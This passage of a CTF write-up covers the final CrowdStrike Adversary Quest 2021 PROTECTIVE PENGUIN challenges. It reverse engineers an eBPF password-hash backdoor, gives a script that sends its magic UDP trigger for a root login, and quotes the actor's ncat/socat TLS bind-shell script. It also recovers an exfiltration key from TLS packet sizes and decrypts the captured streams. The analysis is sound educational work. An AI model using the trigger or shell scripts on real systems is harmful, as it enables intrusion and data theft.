194: (18) r1 = map[id:4][0]+0
 196: (79) r2 = *(u64 *)(r10 -272)
 197: (bf) r3 = r2
 198: (77) r3 >>= 56
 199: (73) *(u8 *)(r1 +32) = r3
 200: (bf) r3 = r2
 201: (77) r3 >>= 48
 202: (73) *(u8 *)(r1 +31) = r3
 203: (bf) r3 = r2
 204: (77) r3 >>= 40
 205: (73) *(u8 *)(r1 +30) = r3
 206: (bf) r3 = r2
 207: (77) r3 >>= 32
 208: (73) *(u8 *)(r1 +29) = r3
 209: (bf) r3 = r2
 210: (77) r3 >>= 24
 211: (73) *(u8 *)(r1 +28) = r3
 212: (bf) r3 = r2
 213: (77) r3 >>= 16
 214: (73) *(u8 *)(r1 +27) = r3
 215: (bf) r3 = r2
 216: (77) r3 >>= 8
 217: (73) *(u8 *)(r1 +26) = r3
 218: (73) *(u8 *)(r1 +25) = r2
[...]
 283: (bf) r3 = r2
 284: (77) r3 >>= 16
 285: (73) *(u8 *)(r1 +3) = r3
 286: (73) *(u8 *)(r1 +1) = r2
 287: (77) r2 >>= 8
 288: (73) *(u8 *)(r1 +2) = r2

The whole buffer, which is 34 bytes in size, is copied into a memory region that is accessed through a base pointer stored in register r1. So far, only offsets within the range [1..34] are used for storing the buffer. Offset 0 is used to store the fixed value 1 as the following code shows:

289: (b7) r2 = 1
 290: (73) *(u8 *)(r1 +0) = r2

The layout of the memory region can be illustrated as follows:

Offset relative to r1 / bytes Size / bytes Data Structure
0 1 Flag set to 1 unconditionally
+1 34 34-byte buffer “$1$...

Finally, the last part of the eBPF program sets its return value to 0 before the exit instruction is executed.

291: (b7) r0 = 0
 292: (95) exit

After reverse engineering this eBPF tracepoint in depth, a pretty accurate understanding of its functionality has been established. The upside of this approach is that it yields exact information, but the downside is that it can be pretty time-consuming. Another valid approach, especially during a capture-the-flag event, would be to focus on a few key parts of the code and try to conclude what the whole code likely does. Then, analyzing previously skipped code only becomes necessary if further analysis generates doubts about previous assumptions or if it is concluded that an assumption is missing a relevant part.

For example, the port 1337/UDP was already known from the run.sh script. Searching the eBPF code for that number would allow the analyst to skip the first 70ish instructions while still being able to conclude that the memory accessed for the port comparison is likely a field of the UDP header. Similarly, the XOR operations and the extensive copy instructions could have been skipped without losing too much confidence. Key questions that still would have required reverse engineering could have been reduced to:

  • How long is the payload?
  • What is the structure of the payload?
  • What is the presumed function of a certain payload?

This strategy will be applied for the rest of this writeup. Without looking at the code of the two getspnam_r() probes, it is a reasonable assumption that the code reads from the mapped memory region and might use the data from the UDP payload to manipulate returned /etc/shadow entries via the bpf_probe_write_user() function. Revisiting the previous listing of eBPF programs, it can be seen that the assumed exit hook of getspnam_r() is in fact allowed to access the eBPF map with id=4.

root@egghunt:~# bpftool prog list
[...]
16: tracepoint  name kprobe_netif_re  tag e0d014d973f44213  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 2344B  jited 1544B  memlock 4096B  map_ids 4
	btf_id 5
17: kprobe  name getspnam_r_entr  tag acab388c8f8ef0f9  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 336B  jited 223B  memlock 4096B  map_ids 3
	btf_id 5
18: kprobe  name getspnam_r_exit  tag ceeabb4ac5b9ed45  gpl
	loaded_at 2021-03-23T12:20:05+0000  uid 0
	xlated 328B  jited 209B  memlock 4096B  map_ids 3,4
	btf_id 5

Luckily, bpftool provides a convenient way to list and dump eBPF maps:

root@egghunt:~# bpftool map list
[...]
4: array  name implant_.bss  flags 0x400
	key 4B  value 36B  max_entries 1  memlock 8192B
	btf_id 5
root@egghunt:~# bpftool map dump id 4
[{
        "value": {
            ".bss": [{
                    "backdoor": {
                        "enabled": false,
                        "hash": ""
                    }
                }
            ]
        }
    }
]

The dumped map layout aligns nicely with the layout that was obtained through reverse engineering the code of the netif_receive_skb tracepoint. The previously unidentified flag appears to be a simple on/off switch, judging by the name enabled, while the 34-byte buffer is named hash. A plausible explanation would be that the netif_receive_skb tracepoint code is responsible for deobfuscating and storing a crypt password hash in the mapped memory region before enabling the on/off switch. Then, the getspnam_r_exit probe would check the eBPF map in order to determine whether a magic UDP packet has already been received. In that case, it would return that password hash instead of the entry from the shadow file, allowing the attacker to log in as any user with a password of their choice. To test this hypothesis, a password hash for “foobar” is generated:

$ echo -ne foobar | openssl passwd -1 -in - 
$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km.

The resulting salted MD5 hash is exactly 34 characters long. Shown below is a short Python script that obfuscates the password hash as expected by the tracepoint and sends the UDP magic packet to an arbitrary destination address:

$ cat send-hash.py 
#!/usr/bin/env python3

import socket
import sys

pwd_hash = '$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km.'
data = bytes([b^66 for b in pwd_hash.encode()])
assert(data.startswith(b'fsf'))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(data, (sys.argv[1], int(sys.argv[2])))

The script can be invoked with the destination IP and port as arguments that, in this case, target the local challenge VM:

$ ./send-hash.py 127.0.0.1 1337

After sending the magic UDP packet, the eBPF map with id=4 can be dumped again:

root@egghunt:~# bpftool map dump id 4
[{
        "value": {
            ".bss": [{
                    "backdoor": {
                        "enabled": true,
                        "hash": "$1$1HwFxqXw$EMuwnpKPPReu.AcjXt4km."
                    }
                }
            ]
        }
    }
]

In fact, the desired password hash has been stored and the enabled flag has been set to true. Finally, we can verify our assumptions about the uprobes by trying to log in as root via SSH using the password “foobar”:

$ ssh -p 4422 root@127.0.0.1
[...]
root@127.0.0.1's password: foobar
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-33-generic x86_64)
[...]
Last login: Thu Jan 14 12:14:16 2021
root@egghunt:~# id
uid=0(root) gid=0(root) groups=0(root)

This confirms that we now know sufficiently well how the backdoor works, and we can use the same Python script to retrieve the flag from the remote machine:

$ ssh root@egghunt.challenges.adversary.zone
root@egghunt.challenges.adversary.zone's password: foobar
PTY allocation request failed on channel 0
CS{ebpf_b4ckd00r_ftw}
Connection to egghunt.challenges.adversary.zone closed.

Challenge 4: Exfiltrat0r

The following description was given for the final challenge in the PROTECTIVE PENGUIN track:

Additional analysis of the victim network allowed us to recover some PROTECTIVE PENGUIN tooling that appears to provide remote shell and data exfiltration capabilities. While we were able to capture some network traffic of these tools in action, all communications are encrypted. We have wrapped all relevant information into a TAR archive.

Are you able to identify any weaknesses that would allow us to recover the encryption key and figure out what data was exfiltrated?

As shown in the following listing, extracting the provided TAR archive leaves us with three files:

$ tar xfv exfiltrat0r.tar.gz
cryptshell.sh
exfil.py
trace.pcapng

Consistent with the challenge description, the file cryptshell.sh provides functionality that spawns or connects to a TLS-based interactive bind shell:

#!/bin/sh

listen() {
    exec ncat -lvk4 $1 $2 --ssl -c 'python3 -c "import pty;pty.spawn(\"/bin/bash\")"'
}

connect() {
    exec socat -,raw,echo=0 SSL:$1:$2,verify=0
    #exec socat - SSL:$1:$2,verify=0
}

if [ $# -eq 3 ] && [ $1 = "listen" ] ; then
    listen $2 $3
fi

if [ $# -eq 3 ] && [ $1 = "connect" ] ; then
    connect $2 $3
fi

It can be invoked as follows to spawn a bind shell that can be accessed through TLS:

$ ./cryptshell.sh listen 127.0.0.1 1024
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. [...]
Ncat: SHA-1 fingerprint: A568 2AA2 231C DDED 02B9 81E2 [...]
Ncat: Listening on 127.0.0.1:1024

The script can then be used to connect and interact with that shell:

$ ./cryptshell.sh connect 127.0.0.1 1024
id
uid=1000(user) gid=1000(user) groups=1000(user)

Keeping the initial challenge description in mind, it is clear that this is the remote shell tool that was used by the actor to interact with the compromised host.

From a quick glance at the Python script exfil.py, it seems like it implements functionality to exfiltrate files to a given remote host. These files are encrypted on the fly. This is also in line with the challenge description that mentions the exfiltration of files from the compromised host and asks us to recover their encryption key or content.

As can be seen in the tool’s help description, it requires to enter a remote address and at least one file path:

$ ./exfil.py
usage: exfil.py [-h] [-k KEY] host port file [file ...]
exfil.py: error: the following arguments are required: host, port, file

If no key is provided on the command line through the -k parameter, the tool enters an interactive key prompt that displays each entered character as colorized ASCII art after a prompt is printed:

Finally, the provided PCAP file trace.pcapng was further analyzed in Wireshark. As mentioned in the description, it seems to contain traffic that belongs to the aforementioned tools. As can be seen using Wireshark’s Conversations window, the PCAP contains four distinct TCP connections:

The first connection was initiated from a client 192.168.122.1 to a service listening on 192.168.122.251:31337 while the three following ones are outgoing connections from said host. Having a quick glance at the first connection shows that its data is encapsulated in TLS. Therefore, that connection can likely be tied back to the actor’s TLS bind shell tool cryptshell.sh and was used to interact with the compromised host. Making an educated guess about the subsequent three connections can lead to the assumption that these connections were opened by the Python-based exfiltration tool and contain encrypted data of the exfiltrated files that we’re trying to recover.

Reviewing how encryption is used in the exfiltration tool does not show any immediate weaknesses. The tool uses ChaCha20-Poly1305 as an authenticated stream cipher with uniquely derived cipher keys (based on the key that was provided to exfil.py) for each file to encrypt and authenticate the content. This leaves us with the TLS connection that the attacker used to interact with the host. At first glance, that also might seem like a dead-end, as all data within that stream is strongly encrypted. However, when having a look at the individual TLS packets that were exchanged, it becomes clear that we might be able to derive some information about the attacker’s interactions with the host solely based on the TLS packet sizes.

The following tshark command can be used to gain a quick overview of the individual packets’ TLS record lengths:

$ tshark -T fields -e ip.src -e ip.dst -e tls.record.length -r trace.pcapng tls
[...]
192.168.122.251	192.168.122.1	23
192.168.122.251	192.168.122.1	20
192.168.122.251	192.168.122.1	177
192.168.122.251	192.168.122.1	393
192.168.122.251	192.168.122.1	465
192.168.122.251	192.168.122.1	381
192.168.122.251	192.168.122.1	117
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	194
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	572
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	817
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1050
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1341
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1618
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	1848
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2159
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2456
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2661
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	2952
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	3283
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	3646
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	157
192.168.122.251	192.168.122.1	160
192.168.122.251	192.168.122.1	157
192.168.122.251	192.168.122.1	19
192.168.122.251	192.168.122.1	77
192.168.122.1	192.168.122.251	18
192.168.122.251	192.168.122.1	23
192.168.122.251	192.168.122.1	19

Especially interesting is the sequence in which the client (192.168.122.1) sends multiple 18 byte TLS records that are each followed by an increasingly large response by the server. This pattern might originate from the interactive key prompt that we saw earlier when having a look at the exfiltration program. Each 18 byte could resemble a single keystroke that is followed by the ASCII art response displaying the entered key.

That assumption is further supported by the fact that the server sends a couple of packets containing some significant amount of content right before that sequence, which could resemble the initially printed “Enter key:” prompt:

[...]
192.168.122.251	192.168.122.1	177
192.168.122.251	192.168.122.1	393
192.168.122.251	192.168.122.1	465
192.168.122.251	192.168.122.1	381
192.168.122.251	192.168.122.1	117
[...]

Further in line with our assumptions is that immediately after the suspected keystroke sequence ends, the server opens the three outgoing TCP connections, which likely contain the encrypted data of the exfiltrated files.

Based on this preliminary analysis, we further investigated whether the observed packet sizes indeed allow us to infer which key was entered. Corresponding to the amount of keystroke/response packet pairs, we can derive that the entered key seems to consist of 13 characters. As can be seen in Wireshark, the TLS connection uses AES-256-GCM-SHA358 as its cipher suite, which provides an authenticated stream cipher based on AES. Therefore, we should be able to accurately infer the exact size of the underlying plaintext content, as no padding is added to the packets (as opposed to a mode working on full blocks). However, the cipher suite does add some additional data used for authentication so that the TLS packets application data sizes do not exactly match the sizes of the ASCII art characters that are hard-coded in the exfiltration program.

A quick local test, using the tools in a similar fashion as the actor and observing the TLS packet sizes, showed that it seems like there is a fixed overhead of 22 bytes per TLS application data packet. Taking this into account, we wrote the following Python script that enumerates all viable key candidates by using the exfiltration script’s main ASCII art output class AsciiSequence to examine the sequence output size:

#!/usr/bin/env python3

import string
import itertools
from pprint import pprint
from collections import defaultdict
from exfil import AsciiSequence

# the record lengths extracted using the tshark command:
SIZES = [
    194,
    572,
    817,
    1050,
    1341,
    1618,
    1848,
    2159,
    2456,
    2661,
    2952,
    3283,
    3646,
]

OVERHEAD = 22

candidates = defaultdict(list)

for i, size in enumerate(SIZES):
    seq = AsciiSequence()

    for j in range(len(candidates)):
        seq.add_char(candidates[j][0])

    for candidate in string.printable:
        total = 0

        if seq.plain_chars:
            total += len(seq.clear())

        seq.add_char(candidate)
        try:
            total += len(seq.render())
        except IndexError:
            seq.pop()
            continue

        if total + OVERHEAD == size:
            candidates[i].append(candidate)

        seq.pop()


print("Candidates")
pprint(dict(candidates))
print("Combinations:", reduce(mul, map(len, candidates.values()), 1))

Executing the script gives us the following output showing the possible candidates per position of the key:

$ ./candidates.py
Candidates
{0: ['m'],
 1: ['g', 'y', 'O'],
 2: ['-', '_'],
 3: ['s', '"', ';', '\\'],
 4: ['3', 'k', 'F', 'T'],
 5: ['c'],
 6: ['r'],
 7: ['3', 'k', 'F', 'T'],
 8: ['7', 't'],
 9: ['-', '_'],
 10: ['3', 'k', 'F', 'T'],
 11: ['3', 'k', 'F', 'T'],
 12: ['g', 'y', 'O']}
Combinations: 73728

This leaves us with a total of 73,728 potential keys, of which we could easily find the correct one by brute force. However, when looking at the candidate dictionary, it can be seen quite easily that the key likely appears to be either my_s3cr3t_k3y or my-s3cr3t-k3y.

As a next step, we extracted the three TCP streams data by using tcpflow:

$ tcpflow -r trace.pcapng "dst port 1234"
$ ls *1234*
192.168.122.251.57760-192.168.122.001.01234  192.168.122.251.57764-192.168.122.001.01234
192.168.122.251.57762-192.168.122.001.01234

The following Python script was then implemented in order to decrypt the streams by using the key my_s3cr3t_key (attempting decryption with the other key immediately raises an exception due to failure of the cipher’s authentication mechanism):

#!/usr/bin/env python3

import struct
import io
import os
from Crypto.Cipher import ChaCha20_Poly1305
from Crypto.Protocol.KDF import scrypt
from Crypto.Random import get_random_bytes

KEY = "my_s3cr3t_k3y"

streams = [
    "192.168.122.251.57760-192.168.122.001.01234",
    "192.168.122.251.57762-192.168.122.001.01234",
    "192.168.122.251.57764-192.168.122.001.01234",
]

def decrypt(data, key):
    msg_buf = io.BytesIO(data)
    version = msg_buf.read(1)
    cipher_nonce_len = struct.unpack("B", msg_buf.read(1))[0]
    cipher_nonce = msg_buf.read(cipher_nonce_len)
    key_salt_len = struct.unpack("B", msg_buf.read(1))[0]
    key_salt = msg_buf.read(key_salt_len)
    remaining = msg_buf.read()
    ciphertext = remaining[:-16]
    digest = data[-16:]

    derived_key = scrypt(key, key_salt, 32, 2**14, 8, 1)
    cipher = ChaCha20_Poly1305.new(key=derived_key, nonce=cipher_nonce)

    plaintext = cipher.decrypt_and_verify(ciphertext, digest)

    filename_length = struct.unpack(">I", plaintext[:4])[0]
    filename = plaintext[4:4 + filename_length]
    file_data = plaintext[4 + filename_length:]

    return (filename.decode(), file_data)


for stream in streams:
    with open(stream, "rb") as infile:
        filename, file_data = decrypt(infile.read(), KEY)
        filename = os.path.basename(filename)
        print(f"Decrypted {filename}")
        with open(filename, "wb") as outfile:
            outfile.write(file_data)

As expected, executing the script yields three different files:

$ ./decrypt.py
Decrypted passwd
Decrypted internal.dat
Decrypted network.png

The flag can be found as part of the image file network.png, concluding the PROTECTIVE PENGUIN challenge track:

Final Remarks

This concludes our journey through the third and final PROTECTIVE PENGUIN challenge track and the CrowdStrike Intelligence Adversary Quest 2021. We hope you enjoyed the game. Make sure to check out the CATAPULT SPIDER challenges and the SPACE JACKAL challenges as well. If you have any questions, feel free to email us at adversaryquest@crowdstrike.com. (Also note that we are looking for a Sr. Security Researcher to join the team.)

Additional Resources

CrowdStrike Falcon Free Trial
 

Try CrowdStrike Free for 15 Days Get Started with A Free Trial